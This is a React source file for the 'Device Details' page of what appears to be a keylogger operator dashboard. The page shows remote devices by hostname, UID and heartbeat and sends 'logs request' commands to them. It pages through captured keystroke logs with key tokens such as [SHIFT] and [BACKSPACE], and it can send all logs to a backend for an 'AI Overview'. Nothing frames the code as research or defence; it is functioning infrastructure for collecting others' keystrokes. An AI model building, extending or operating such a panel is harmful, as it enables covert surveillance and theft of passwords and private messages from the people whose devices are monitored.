import React, { useEffect, useState, useRef } from "react";
import { useParams } from "react-router-dom";
import { get, post } from "../utils/request";
import { format, formatDistanceToNow } from "date-fns";
import Navbar from "../components/navbar";
import Loader from "../components/loader";
import RefreshBtn from "../components/refreshBtn";
import { subscribeToPusherEvent } from "../utils/pusher";
import CustomLink from "../components/customLink";
import { HiComputerDesktop } from "react-icons/hi2";
import {
  MdAccessTime,
  MdEdit,
  MdOutlineStorage,
  MdRefresh,
  MdSend,
  MdCode,
  MdTextFields,
} from "react-icons/md";
import { FaHashtag, FaArrowLeft } from "react-icons/fa";
import { marked } from "marked";
import CustomAlert from "../components/customAlert";

marked.setOptions({
  sanitize: true,
  breaks: true,
  smartypants: true,
});

const DeviceDetail = () => {
  const { uid } = useParams();

  const [device, setDevice] = useState(null);
  const [alias, setAlias] = useState("");
  const [savingAlias, setSavingAlias] = useState(false);
  const [logs, setLogs] = useState([]);
  const [loadingDevice, setLoadingDevice] = useState(true);
  const [loadingLogs, setLoadingLogs] = useState(true);
  const [sendingLogsRequest, setSendingLogsRequest] = useState(false);
  const [refreshingHeartbeat, setRefreshingHeartbeat] = useState(false);
  const [aliasError, setAliasError] = useState("");
  const [fromDate, setFromDate] = useState("");
  const [fromTime, setFromTime] = useState("");
  const [toDate, setToDate] = useState("");
  const [toTime, setToTime] = useState("");
  const [page, setPage] = useState(1);
  const [hasMoreLogs, setHasMoreLogs] = useState(true);
  const [loadingMore, setLoadingMore] = useState(false);
  const logsEndRef = useRef(null);
  const [viewMode, setViewMode] = useState("pretty");
  const unsubscribeHeartbeatRef = useRef(null);
  const [aiOverview, setAiOverview] = useState("");
  const [loadingAiOverview, setLoadingAiOverview] = useState(false);
  const [aiError, setAiError] = useState("");
  const [isSubscribedToHeartbeat, setIsSubscribedToHeartbeat] = useState(false);
  const [alertMessage, setAlertMessage] = useState("");
  const [showAlert, setShowAlert] = useState(false);

  const fetchDevice = async () => {
    setLoadingDevice(true);
    const response = await get(`/device/${uid}`);
    if (response && response.success) {
      setDevice(response.data);
      setAlias(response.data.alias || "");
    } else if (response && response.error) {
      setAlertMessage(response.error);
      setShowAlert(true);
      setTimeout(() => {
        window.location.href = "/devices";
      }, 2000);
    }
    setLoadingDevice(false);
  };

  const fetchAllLogs = async () => {
    if (loadingLogs || loadingMore) return [];
    setLoadingMore(true);

    try {
      const allLogs = [];
      let currentPage = 1;

      const first = await fetchLogs(true, currentPage);
      if (!first || !first.newLogs) {
        return allLogs;
      }
      allLogs.push(...first.newLogs);

      while (first.newLogs.length === 5 || (allLogs.length > 0 && allLogs.length % 5 === 0)) {
        currentPage += 1;
        const pageResp = await fetchLogs(false, currentPage);
        if (!pageResp || !pageResp.newLogs || !pageResp.newLogs.length) {
          break;
        }
        allLogs.push(...pageResp.newLogs);
        if (!pageResp.hasMore) break;
      }

      setLogs(allLogs);
      setPage(currentPage);
      setHasMoreLogs(false);

      return allLogs;
    } finally {
      setLoadingMore(false);
    }
  };

  const fetchAiOverview = async () => {
    if (!logs.length) return;
    setLoadingAiOverview(true);
    setAiError("");
    setAiOverview("");

    const allLogs = await fetchAllLogs();

    if (!allLogs || !allLogs.length) {
      setAiError("No logs available for the selected range.");
      return;
    }

    const response = await post("/logs/overview", { logs: allLogs });
    if (response && response.success) {
      setAiOverview(response.overview || "");
    } else {
      setAiError(
        response && response.error
          ? response.error
          : "Failed to generate overview."
      );
    }

    setLoadingAiOverview(false);
  };

  const fetchLogs = async (reset = false, pageOverride = null) => {
    if (reset) {
      setLoadingLogs(true);
      setPage(1);
      setHasMoreLogs(true);
    } else {
      setLoadingMore(true);
    }

    try {
      const params = new URLSearchParams();

      if (fromDate) {
        const from = new Date(fromDate);
        if (fromTime) {
          const [hours, minutes] = fromTime.split(":").map(Number);
          from.setHours(hours ?? 0, minutes ?? 0, 0, 0);
        } else {
          from.setHours(0, 0, 0, 0);
        }
        params.append("from", String(from.getTime()));
      }

      if (toDate) {
        const toVal = new Date(toDate);
        if (toTime) {
          const [hours, minutes] = toTime.split(":").map(Number);
          toVal.setHours(hours ?? 23, minutes ?? 59, 59, 999);
        } else {
          toVal.setHours(23, 59, 59, 999);
        }
        params.append("to", String(toVal.getTime()));
      }

      const limit = 5;
      const pageToLoad = pageOverride != null ? pageOverride : reset ? 1 : page + 1;
      params.append("limit", String(limit));
      params.append("page", String(pageToLoad));

      const query = params.toString() ? `?${params.toString()}` : "";

      const response = await get(`/device/${uid}/logs${query}`);
      let newLogs = [];
      if (response && response.success) {
        newLogs = response.data || [];

        if (reset) {
          setLogs(newLogs);
        } else {
          setLogs((prev) => [...prev, ...newLogs]);
        }

        setPage(pageToLoad);
        if (newLogs.length < limit) {
          setHasMoreLogs(false);
        }
      } else {
        setHasMoreLogs(false);
      }

      return { newLogs, hasMore: newLogs.length === limit };
    } finally {
      if (reset) {
        setLoadingLogs(false);
      } else {
        setLoadingMore(false);
      }
    }
  };


  const handleSaveAlias = async () => {
    if (!alias.trim()) {
      setAliasError("Alias cannot be empty.");
      return;
    }
    setAliasError("");
    setSavingAlias(true);
    const response = await post(`/device/${uid}/alias`, {
      alias: alias.trim(),
    });
    if (response && response.success) {
      await fetchDevice();
    } else if (response && response.error) {
      setAlertMessage(response.error);
      setShowAlert(true);
    }
    setSavingAlias(false);
  };

  useEffect(() => {
    if (!device?.uid) return;

    if (unsubscribeHeartbeatRef.current) {
      unsubscribeHeartbeatRef.current();
    }

    const unsubscribe = subscribeToPusherEvent("heartbeat", (data) => {
      if (data.uid === device.uid) {
        setDevice((prev) => ({
          ...prev,
          heartbeat: data.timestamp,
        }));
      }
    });

    unsubscribeHeartbeatRef.current = unsubscribe;
    setIsSubscribedToHeartbeat(true);

    return () => {
      if (unsubscribeHeartbeatRef.current) {
        unsubscribeHeartbeatRef.current();
        unsubscribeHeartbeatRef.current = null;
      }
      setIsSubscribedToHeartbeat(false);
    };
  }, [device?.uid]);

  const handleRefreshHeartbeat = async () => {
    if (!device) return;
    setRefreshingHeartbeat(true);
    try {
      const response = await post("/send-heartbeat", { uid: device.uid });
      if (response && !response.success && response.error) {
        setAlertMessage(response.error);
        setShowAlert(true);
      }
    } catch (error) {
      console.error("Error refreshing heartbeat:", error);
    } finally {
      setTimeout(() => {
        setRefreshingHeartbeat(false);
      }, 500);
    }
  };

  const handleSendLogsRequest = async () => {
    if (!device) return;
    setSendingLogsRequest(true);
    const response = await post("/send-logs-request", { uid: device.uid });
    if (response && !response.success && response.error) {
      setAlertMessage(response.error);
      setShowAlert(true);
    }
    setSendingLogsRequest(false);
  };

  useEffect(() => {
    fetchDevice();
    fetchLogs(true);
  }, [uid]);

  useEffect(() => {
    if (!logsEndRef.current) return;

    const observer = new IntersectionObserver((entries) => {
      const [entry] = entries;
      if (entry.isIntersecting && hasMoreLogs && !loadingMore && !loadingLogs) {
        console.log("[Logs] Intersection triggered, loading more");
        fetchLogs(false);
      }
    });

    observer.observe(logsEndRef.current);
    console.log("[Logs] Observer mounted", {
      logsLength: logs.length,
      hasMoreLogs,
      loadingDevice,
    });

    return () => {
      if (logsEndRef.current) {
        observer.unobserve(logsEndRef.current);
      }
    };
  }, [
    logs.length,
    hasMoreLogs,
    loadingMore,
    loadingLogs,
    loadingDevice,
    device,
  ]);

  const renderDeviceInfo = () => {
    if (!device) return null;

    const lastActive = device.heartbeat
      ? formatDistanceToNow(new Date(device.heartbeat), { addSuffix: true })
      : "Never";

    return (
      <div className="space-y-6">
        <div className="flex items-center gap-3 pb-4 border-b border-gray-700">
          <HiComputerDesktop className="text-fg" size={32} />
          <div>
            <div className="text-xs text-gray-500 uppercase tracking-wide">Device Alias</div>
            <div className="text-xl font-bold text-white break-all">
              {device.alias || "Unnamed Device"}
            </div>
          </div>
        </div>

        <div className="bg-gray-800 rounded-xl">
          <div className="flex items-center gap-2 mb-3">
            <MdEdit className="text-fg" />
            <span className="font-semibold text-white">Edit Alias</span>
          </div>
          <div className="flex items-center gap-2 flex-col">
            <input
              type="text"
              className="border-2 border-gray-700 bg-gray-900 rounded-lg px-3 py-2 text-white focus:outline-none focus:border-fg transition-colors max-w-full"
              value={alias}
              onChange={(e) => setAlias(e.target.value)}
              placeholder="Enter alias"
            />
            <button
              onClick={handleSaveAlias}
              disabled={savingAlias}
              className={`w-full px-4 py-2 rounded-lg text-white text-sm font-semibold flex items-center justify-center gap-2 transition-all whitespace-nowrap ${savingAlias
                ? "bg-gray-700 cursor-not-allowed"
                : "bg-fg hover:bg-blue-600"
                }`}
            >
              {savingAlias ? (
                "Saving..."
              ) : (
                <>
                  <MdEdit size={16} />
                  <span>Save</span>
                </>
              )}
            </button>
          </div>
          {aliasError && (
            <p className="text-red-400 text-xs mt-2">{aliasError}</p>
          )}
        </div>

        <div className="space-y-4">
          <div className="flex items-center gap-3 text-gray-300">
            <HiComputerDesktop className="text-fg" size={20} />
            <div>
              <div className="text-xs text-gray-500">Hostname</div>
              <div className="font-medium">{device.hostname}</div>
            </div>
          </div>

          <div className="flex items-center justify-between">
            <div className="flex items-center gap-3 text-gray-300">
              <MdAccessTime className="text-fg" size={20} />
              <div>
                <div className="text-xs text-gray-500">Last Active</div>
                <div className="font-medium">{lastActive}</div>
              </div>
            </div>
            <RefreshBtn
              onClick={handleRefreshHeartbeat}
              spin={refreshingHeartbeat}
            />
          </div>

          <div className="flex items-center gap-3 text-gray-300">
            <MdOutlineStorage className="text-fg" size={20} />
            <div>
              <div className="text-xs text-gray-500">Registered At</div>
              <div className="font-medium">
                {device.createdAt
                  ? format(new Date(device.createdAt), "dd/MM/yyyy HH:mm:ss")
                  : "Unknown"}
              </div>
            </div>
          </div>

          <div className="flex items-start gap-3 text-gray-300">
            <FaHashtag className="text-fg mt-1" size={16} />
            <div className="flex-1">
              <div className="text-xs text-gray-500">UID</div>
              <div className="font-mono text-xs break-all">{device.uid}</div>
            </div>
          </div>
        </div>

        <div className="pt-4 border-t border-gray-700 flex flex-col gap-3">
          <CustomLink
            button={true}
            text={
              sendingLogsRequest
                ? "Sending Logs Request..."
                : "Send Logs Request"
            }
            onClick={handleSendLogsRequest}
            showLoader={sendingLogsRequest}
            iconLeft={!sendingLogsRequest ? <MdSend /> : null}
            iconSize={18}
          />
          <CustomLink
            button={true}
            text={loadingLogs ? "Refreshing Logs..." : "Refresh Logs"}
            onClick={() => fetchLogs(true)}
            showLoader={loadingLogs}
            iconLeft={!loadingLogs ? <MdRefresh /> : null}
            iconSize={18}
          />
        </div>
      </div>
    );
  };

  const renderLogs = () => {
    if (loadingLogs) {
      return <Loader show={true} text="Loading logs" className="my-4" />;
    }

    if (!logs.length) {
      return (
        <p className="text-gray-400 mt-4 text-center py-8">
          No logs available for this device and date range.
        </p>
      );
    }

    if (viewMode === "ai") {
      if (loadingAiOverview) {
        return (
          <Loader show={true} text="Generating overview" className="my-4" />
        );
      }

      if (aiError) {
        return <p className="text-red-400 mt-4 text-sm">{aiError}</p>;
      }

      if (!aiOverview) {
        return (
          <p className="text-gray-400 mt-4 text-sm text-center py-8">
            Click AI Overview to analyze the current logs.
          </p>
        );
      }

      return (
        <div className="markdown-body mt-4 border border-fg/30 !bg-gray-800 rounded-xl p-6 text-sm leading-relaxed">
          <style
            dangerouslySetInnerHTML={{
              __html: `
            .markdown-body ul {
              list-style-type: disc;
              padding-left: 2em;
            }
            .markdown-body ol {
              list-style-type: decimal;
              padding-left: 2em;
            }
          `,
            }}
          />
          <div className="">
            <div dangerouslySetInnerHTML={{ __html: marked(aiOverview) }} />
          </div>
        </div>
      );
    }

    const renderPrettyContent = (text) => {
      const tokenMeta = {
        "[TAB]": { label: "Tab", className: "bg-blue-800 text-blue-200" },
        "[SPACE]": { label: "Space", className: "bg-blue-800 text-blue-200" },

        "[ENTER]": { label: "Enter", className: "bg-green-800 text-green-200" },

        "[SHIFT]": {
          label: "Shift",
          className: "bg-purple-800 text-purple-200",
        },
        "[SHIFT_L]": {
          label: "Shift L",
          className: "bg-purple-800 text-purple-200",
        },
        "[SHIFT_R]": {
          label: "Shift R",
          className: "bg-purple-800 text-purple-200",
        },

        "[CTRL]": { label: "Ctrl", className: "bg-yellow-800 text-yellow-200" },
        "[ALT]": { label: "Alt", className: "bg-yellow-800 text-yellow-200" },

        "[BACKSPACE]": {
          label: "Backspace",
          className: "bg-red-800 text-red-200",
        },
        "[DELETE]": {
          label: "Delete",
          className: "bg-red-800 text-red-200",
        },

        "[UP]": { label: "↑", className: "bg-teal-800 text-teal-200" },
        "[DOWN]": { label: "↓", className: "bg-teal-800 text-teal-200" },
        "[LEFT]": { label: "←", className: "bg-teal-800 text-teal-200" },
        "[RIGHT]": { label: "→", className: "bg-teal-800 text-teal-200" },
        "[HOME]": { label: "Home", className: "bg-indigo-800 text-indigo-200" },
        "[END]": { label: "End", className: "bg-indigo-800 text-indigo-200" },
        "[PAGE_UP]": {
          label: "PgUp",
          className: "bg-indigo-800 text-indigo-200",
        },
        "[PAGE_DOWN]": {
          label: "PgDn",
          className: "bg-indigo-800 text-indigo-200",
        },
      };

      const parts = text.split(/(\[[A-Z0-9_]+\])/g);

      return parts.map((part, idx) => {
        const fnMatch = part.match(/^\[F([1-9]|1[0-2])\]$/);
        if (fnMatch) {
          const label = `F${fnMatch[1]}`;
          return (
            <span
              key={idx}
              className="inline-flex items-center px-2 py-0.5 mx-0.5 rounded bg-orange-800 text-orange-200 text-xs font-mono"
            >
              {label}
            </span>
          );
        }

        const meta = tokenMeta[part];
        if (meta) {
          return (
            <span
              key={idx}
              className={`inline-flex items-center px-2 py-0.5 mx-0.5 rounded text-xs font-mono ${meta.className}`}
            >
              {meta.label}
            </span>
          );
        }

        return <span key={idx}>{part}</span>;
      });
    };

    return (
      <div className="mt-4 space-y-3">
        {logs.map((log, index) => (
          <div
            key={index}
            className="border border-gray-700 rounded-xl p-4 bg-gray-800 text-white hover:border-gray-600 transition-colors"
          >
            <div className="text-xs text-gray-500 mb-3 font-mono">
              {log.timestamp
                ? format(new Date(log.timestamp), "dd/MM/yyyy HH:mm:ss")
                : "Unknown time"}
            </div>
            {viewMode === "raw" ? (
              <pre className="whitespace-pre-wrap break-all text-sm text-gray-300">
                {log.logs}
              </pre>
            ) : (
              <div className="whitespace-pre-wrap break-all text-sm text-gray-200">
                {renderPrettyContent(log.logs)}
              </div>
            )}
          </div>
        ))}
      </div>
    );
  };

  return (
    <div className="min-h-screen bg-bg">
      <Navbar />
      <div className="mx-auto px-6 py-10 text-white">
        <div className="mb-6 w-fit">
          <CustomLink
            text="Back to Devices"
            link="/devices"
            iconLeft={<FaArrowLeft />}
            iconSize={18}
          />
        </div>

        <h1 className="text-4xl font-bold text-white mb-2 flex items-center gap-3">
          <HiComputerDesktop className="text-fg" />
          <span>Device Details</span>
        </h1>
        <p className="text-gray-400 mb-8">
          View and manage device information and keystroke logs
        </p>

        <Loader show={loadingDevice} text="Loading device" className="my-4" />

        {!loadingDevice && device && (
          <div className="grid grid-cols-1 lg:grid-cols-5 gap-6">
            <div className="lg:col-span-1 border border-gray-700 rounded-2xl p-6 bg-gray-800 h-fit">
              {renderDeviceInfo()}
            </div>

            <div className="lg:col-span-4 border border-gray-700 rounded-2xl p-6 bg-gray-800">
              <div className="flex flex-col sm:flex-row sm:items-center justify-between mb-6 gap-4">
                <h2 className="text-2xl font-bold text-white">Logs</h2>
                <div className="flex items-center gap-2 flex-wrap">
                  <button
                    onClick={() => setViewMode("pretty")}
                    className={`px-3 py-2 rounded-lg flex items-center gap-2 border text-sm font-medium transition-all ${viewMode === "pretty"
                      ? "bg-fg text-white border-fg shadow-lg"
                      : "bg-gray-700 text-gray-300 border-gray-600 hover:bg-gray-600"
                      }`}
                  >
                    <MdTextFields size={16} />
                    <span>Pretty</span>
                  </button>
                  <button
                    onClick={() => setViewMode("raw")}
                    className={`px-3 py-2 rounded-lg flex items-center gap-2 border text-sm font-medium transition-all ${viewMode === "raw"
                      ? "bg-gray-300 text-gray-900 border-gray-300 shadow-lg"
                      : "bg-gray-700 text-gray-300 border-gray-600 hover:bg-gray-600"
                      }`}
                  >
                    <MdCode size={16} />
                    <span>Raw</span>
                  </button>
                  <button
                    onClick={async () => {
                      setViewMode("ai");
                      await fetchAiOverview();
                    }}
                    className={`px-3 py-2 rounded-lg flex items-center gap-2 border text-sm font-medium transition-all ${viewMode === "ai"
                      ? "bg-gradient-to-r from-purple-500 via-pink-500 to-orange-400 text-white border-transparent shadow-lg"
                      : "bg-gray-700 text-gray-300 border-gray-600 hover:from-purple-600 hover:to-pink-500 hover:bg-gradient-to-r hover:text-white"
                      }`}
                  >
                    <span className="w-2 h-2 rounded-full bg-green-300 animate-pulse" />
                    <span>AI Overview</span>
                  </button>
                </div>
              </div>

              <div className="bg-gray-900 rounded-xl p-4 mb-6 border border-gray-700">
                <div className="grid grid-cols-1 md:grid-cols-2 gap-4 mb-4">
                  <div className="flex flex-col">
                    <label className="text-sm text-gray-400 mb-2 font-medium">From</label>
                    <input
                      type="date"
                      className="bg-gray-800 border-2 border-gray-700 rounded-lg px-3 py-2 text-white text-sm focus:outline-none focus:border-fg transition-colors"
                      value={fromDate}
                      onChange={(e) => setFromDate(e.target.value)}
                    />
                    <input
                      type="time"
                      className="mt-2 bg-gray-800 border-2 border-gray-700 rounded-lg px-3 py-2 text-white text-sm focus:outline-none focus:border-fg transition-colors"
                      value={fromTime}
                      onChange={(e) => setFromTime(e.target.value)}
                    />
                  </div>
                  <div className="flex flex-col">
                    <label className="text-sm text-gray-400 mb-2 font-medium">To</label>
                    <input
                      type="date"
                      className="bg-gray-800 border-2 border-gray-700 rounded-lg px-3 py-2 text-white text-sm focus:outline-none focus:border-fg transition-colors"
                      value={toDate}
                      onChange={(e) => setToDate(e.target.value)}
                    />
                    <input
                      type="time"
                      className="mt-2 bg-gray-800 border-2 border-gray-700 rounded-lg px-3 py-2 text-white text-sm focus:outline-none focus:border-fg transition-colors"
                      value={toTime}
                      onChange={(e) => setToTime(e.target.value)}
                    />
                  </div>
                </div>
                <div className="flex gap-3">
                  <button
                    onClick={() => viewMode === "ai" ? fetchAiOverview() : fetchLogs(true)}
                    className="flex-1 px-4 py-2 rounded-lg text-white text-sm font-semibold bg-fg hover:bg-blue-600 transition-all flex items-center justify-center gap-2"
                  >
                    <MdSend size={16} />
                    <span>Apply Filters</span>
                  </button>
                  <button
                    onClick={() => {
                      setFromDate("");
                      setFromTime("");
                      setToDate("");
                      setToTime("");
                      viewMode === "ai" ? fetchAiOverview() : fetchLogs(true)
                    }}
                    className="px-4 py-2 rounded-lg text-white text-sm font-semibold bg-gray-700 hover:bg-gray-600 transition-all flex items-center gap-2"
                  >
                    <MdRefresh size={16} />
                    <span>Clear</span>
                  </button>
                </div>
              </div>

              {renderLogs()}
              <div
                ref={logsEndRef}
                className="h-10 flex flex-col items-center justify-center text-xs text-gray-500 mt-4 gap-2"
              >
                {viewMode !== "ai" &&
                  (!hasMoreLogs ? "END" : loadingMore ? "Loading more..." : "")}
              </div>
            </div>
          </div>
        )}
      </div>

      <CustomAlert
        show={showAlert}
        message={alertMessage}
        onClose={() => setShowAlert(false)}
      />
    </div>
  );
};

export default DeviceDetail;
